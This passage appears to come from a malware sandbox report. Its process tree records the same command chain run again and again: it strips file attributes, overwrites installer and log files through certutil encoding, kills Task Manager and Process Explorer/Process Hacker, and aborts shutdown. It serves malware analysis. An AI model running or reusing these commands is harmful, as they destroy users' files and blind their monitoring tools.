    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1908
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2010_x64.log.html" "vcredist2010_x64.log.html".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1068
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1940
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "vcredist2010_x64.log.html" "vcredist2010_x64.log.html".14849
        5⤵
        
        PID:692
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:820
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1732
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2010_x86.log-MSI_vc_red.msi.txt" "vcredist2010_x86.log-MSI_vc_red.msi.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1748
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1456
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "vcredist2010_x86.log-MSI_vc_red.msi.txt" "vcredist2010_x86.log-MSI_vc_red.msi.txt".14849
        5⤵
        
        PID:1636
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1252
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1660
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2010_x86.log.html" "vcredist2010_x86.log.html".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1680
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1892
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "vcredist2010_x86.log.html" "vcredist2010_x86.log.html".14849
        5⤵
        
        PID:1992
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1148
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1512
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2012_x64_0_vcRuntimeMinimum_x64.log" "vcredist2012_x64_0_vcRuntimeMinimum_x64.log".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:760
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:796
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "vcredist2012_x64_0_vcRuntimeMinimum_x64.log" "vcredist2012_x64_0_vcRuntimeMinimum_x64.log".14849
        5⤵
        
        PID:324
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1268
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:764
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2012_x64_1_vcRuntimeAdditional_x64.log" "vcredist2012_x64_1_vcRuntimeAdditional_x64.log".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1452
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1600
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "vcredist2012_x64_1_vcRuntimeAdditional_x64.log" "vcredist2012_x64_1_vcRuntimeAdditional_x64.log".14849
        5⤵
        
        PID:1596
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1712
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1644
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2012_x86_0_vcRuntimeMinimum_x86.log" "vcredist2012_x86_0_vcRuntimeMinimum_x86.log".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:900
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1088
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "vcredist2012_x86_0_vcRuntimeMinimum_x86.log" "vcredist2012_x86_0_vcRuntimeMinimum_x86.log".14849
        5⤵
        
        PID:1940
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:620
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:612
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2012_x86_1_vcRuntimeAdditional_x86.log" "vcredist2012_x86_1_vcRuntimeAdditional_x86.log".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:820
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1152
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "vcredist2012_x86_1_vcRuntimeAdditional_x86.log" "vcredist2012_x86_1_vcRuntimeAdditional_x86.log".14849
        5⤵
        
        PID:1068
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1932
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1636
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2013_x64_000_vcRuntimeMinimum_x64.log" "vcredist2013_x64_000_vcRuntimeMinimum_x64.log".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1532
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Views/modifies file attributes
        
        PID:1440
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "vcredist2013_x64_000_vcRuntimeMinimum_x64.log" "vcredist2013_x64_000_vcRuntimeMinimum_x64.log".14849
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1252
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1660
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1892
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2013_x64_001_vcRuntimeAdditional_x64.log" "vcredist2013_x64_001_vcRuntimeAdditional_x64.log".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1436
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:520
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "vcredist2013_x64_001_vcRuntimeAdditional_x64.log" "vcredist2013_x64_001_vcRuntimeAdditional_x64.log".14849
        5⤵
        
        PID:1840
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1696
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1680
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2013_x86_000_vcRuntimeMinimum_x86.log" "vcredist2013_x86_000_vcRuntimeMinimum_x86.log".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:828
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1480
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "vcredist2013_x86_000_vcRuntimeMinimum_x86.log" "vcredist2013_x86_000_vcRuntimeMinimum_x86.log".14849
        5⤵
        
        PID:324
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:868
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1964
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2013_x86_001_vcRuntimeAdditional_x86.log" "vcredist2013_x86_001_vcRuntimeAdditional_x86.log".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1352
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1568
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "vcredist2013_x86_001_vcRuntimeAdditional_x86.log" "vcredist2013_x86_001_vcRuntimeAdditional_x86.log".14849
        5⤵
        
        PID:1884
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1960
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:944
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2022_x64_000_vcRuntimeMinimum_x64.log" "vcredist2022_x64_000_vcRuntimeMinimum_x64.log".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1908
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1644
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "vcredist2022_x64_000_vcRuntimeMinimum_x64.log" "vcredist2022_x64_000_vcRuntimeMinimum_x64.log".14849
        5⤵
        
        PID:328
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:572
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1776
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2022_x64_001_vcRuntimeAdditional_x64.log" "vcredist2022_x64_001_vcRuntimeAdditional_x64.log".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:612
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:900
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "vcredist2022_x64_001_vcRuntimeAdditional_x64.log" "vcredist2022_x64_001_vcRuntimeAdditional_x64.log".14849
        5⤵
        
        PID:1152
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1068
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1932
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2022_x86_001_vcRuntimeMinimum_x86.log" "vcredist2022_x86_001_vcRuntimeMinimum_x86.log".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1636
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Views/modifies file attributes
        
        PID:820
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "vcredist2022_x86_001_vcRuntimeMinimum_x86.log" "vcredist2022_x86_001_vcRuntimeMinimum_x86.log".14849
        5⤵
        
        PID:332
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1252
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1660
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2022_x86_002_vcRuntimeAdditional_x86.log" "vcredist2022_x86_002_vcRuntimeAdditional_x86.log".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1892
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1988
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "vcredist2022_x86_002_vcRuntimeAdditional_x86.log" "vcredist2022_x86_002_vcRuntimeAdditional_x86.log".14849
        5⤵
        
        PID:436
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        Kills process with taskkill
        
        PID:1816
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1752
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Windows" "Windows".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1436
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "S-1-5-21-999675638-2867687379-27515722-1000" "S-1-5-21-999675638-2867687379-27515722-1000".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1480
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "desktop.ini.20850" "desktop.ini.20850".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1488
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:324
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "desktop.ini.20850" "desktop.ini.20850".14849
        5⤵
        
        PID:760
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:764
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:828
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "All Users" "All Users".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:556
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "{90140000-0011-0000-0000-0000000FF1CE}-C" "{90140000-0011-0000-0000-0000000FF1CE}-C".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:912
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "{90140000-0016-0409-0000-0000000FF1CE}-C" "{90140000-0016-0409-0000-0000000FF1CE}-C".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1692
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "{90140000-0018-0409-0000-0000000FF1CE}-C" "{90140000-0018-0409-0000-0000000FF1CE}-C".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:852
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "{90140000-0019-0409-0000-0000000FF1CE}-C" "{90140000-0019-0409-0000-0000000FF1CE}-C".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1684
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "{90140000-001A-0409-0000-0000000FF1CE}-C" "{90140000-001A-0409-0000-0000000FF1CE}-C".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1960
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "{90140000-001B-0409-0000-0000000FF1CE}-C" "{90140000-001B-0409-0000-0000000FF1CE}-C".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1164
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "{90140000-002C-0409-0000-0000000FF1CE}-C" "{90140000-002C-0409-0000-0000000FF1CE}-C".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1832
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "{90140000-0044-0409-0000-0000000FF1CE}-C" "{90140000-0044-0409-0000-0000000FF1CE}-C".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1920
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "{90140000-00A1-0409-0000-0000000FF1CE}-C" "{90140000-00A1-0409-0000-0000000FF1CE}-C".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1452
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "{90140000-00BA-0409-0000-0000000FF1CE}-C" "{90140000-00BA-0409-0000-0000000FF1CE}-C".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1088
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "{90140000-0115-0409-0000-0000000FF1CE}-C" "{90140000-0115-0409-0000-0000000FF1CE}-C".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1116
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "{90140000-0116-0409-1000-0000000FF1CE}-C" "{90140000-0116-0409-1000-0000000FF1CE}-C".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:672
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "{90140000-0117-0409-0000-0000000FF1CE}-C" "{90140000-0117-0409-0000-0000000FF1CE}-C".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:656
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Office64WW.msi" "Office64WW.msi".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:572
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Views/modifies file attributes
        
        PID:692
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "Office64WW.msi" "Office64WW.msi".14849
        5⤵
        
        PID:1564
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:900
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:648
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Office64WW.xml" "Office64WW.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1760
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Views/modifies file attributes
        
        PID:1700
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "Office64WW.xml" "Office64WW.xml".14849
        5⤵
        
        PID:1656
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:820
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1624
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ose.exe" "ose.exe".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1880
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1900
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "ose.exe" "ose.exe".14849
        5⤵
        
        PID:1652
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:680
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1388
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "osetup.dll" "osetup.dll".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1572
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1560
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "osetup.dll" "osetup.dll".14849
        5⤵
        
        PID:1928
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1148
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:744
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "OWOW64WW.cab" "OWOW64WW.cab".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1480
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:324
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "OWOW64WW.cab" "OWOW64WW.cab".14849
        5⤵
        
        PID:1520
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1576
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:788
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "PidGenX.dll" "PidGenX.dll".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1488
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:556
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "PidGenX.dll" "PidGenX.dll".14849
        5⤵
        
        PID:1736
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:852
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1352
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "pkeyconfig-office.xrm-ms" "pkeyconfig-office.xrm-ms".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1792
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:328
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "pkeyconfig-office.xrm-ms" "pkeyconfig-office.xrm-ms".14849
        5⤵
        
        PID:1940
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:656
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1016
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ProPlusWW.msi" "ProPlusWW.msi".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1152
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:900
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "ProPlusWW.msi" "ProPlusWW.msi".14849
        5⤵
        
        PID:648
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        Kills process with taskkill
        
        PID:1428
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1820
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ProPlusWW.xml" "ProPlusWW.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1540
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:820
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "ProPlusWW.xml" "ProPlusWW.xml".14849
        5⤵
        
        PID:1624
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1664
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:680
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ProPsWW.cab" "ProPsWW.cab".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1388
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Views/modifies file attributes
        
        PID:1880
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "ProPsWW.cab" "ProPsWW.cab".14849
        5⤵
        
        PID:592
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1888
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1512
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ProPsWW2.cab" "ProPsWW2.cab".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1436
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1840
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "ProPsWW2.cab" "ProPsWW2.cab".14849
        5⤵
        
        PID:1364
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1204
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1600
  - - C:\Windows\system32\cmd.exe
